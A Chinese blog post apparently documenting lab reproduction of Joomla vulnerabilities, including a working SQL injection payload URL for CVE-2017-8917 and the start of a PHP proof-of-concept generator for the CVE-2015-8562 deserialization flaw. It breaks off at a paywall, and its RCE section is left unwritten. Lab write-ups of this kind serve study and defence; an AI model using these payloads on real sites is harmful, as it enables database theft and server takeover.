Joomla漏洞复现

原创

已于 2022-08-08 22:20:10 修改 · 1.5k 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#php #web安全

于 2022-08-08 22:19:03 首次发布

本文详细介绍了Joomla CMS的三个安全漏洞，包括3.0.0-3.4.6版本的远程代码执行漏洞、3.7.0的SQL注入漏洞和3.4.5的反序列化漏洞。通过复现这些漏洞，揭示了攻击者可能利用这些漏洞进行服务器入侵和信息泄露的风险。同时，文中给出了漏洞利用的payload和修复建议。

Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现

Joomla是一套内容管理系统，是使用PHP语言加上MYSQL数据库所开发的软件系统，最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php，由于该CMS对函数过滤不严格，导致了远程代码执行漏洞，该漏洞可能导致服务器被入侵、信息泄露等严重风险。

这个有点长，还没搞懂脚本，明天再写

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞

漏洞原理：传送门
直接在kail中开环境，找了payload：

http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

在这里插入图片描述

Joomla 3.4.5 反序列化漏洞（CVE-2015-8562）

还是kail直接开环境
本漏洞根源是PHP5.6.13前的版本在读取存储好的session时，如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中，编码是utf8，当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败，最后触发反序列化漏洞。
通过Joomla中的Gadget，可造成任意代码执行的结果。

影响版本：
Joomla 1.5.x, 2.x, and 3.x before 3.4.6
PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45

复现：
我们不带User-Agent头，先访问一次目标主页，记下服务端返回的Cookie：
在这里插入图片描述
用一下脚本生成poc

<?php
class JSimplepieFactory {
   
   
}
class JDatabaseDriverMysql {
   
   

}
class SimplePie {
   
   
    var $sanitize;
    var $cache;
    var $cache_name_function;
    var $javascript;
    var $feed_url;
    function __construct()
    {
   
   
        $this

最低0.47元/天解锁文章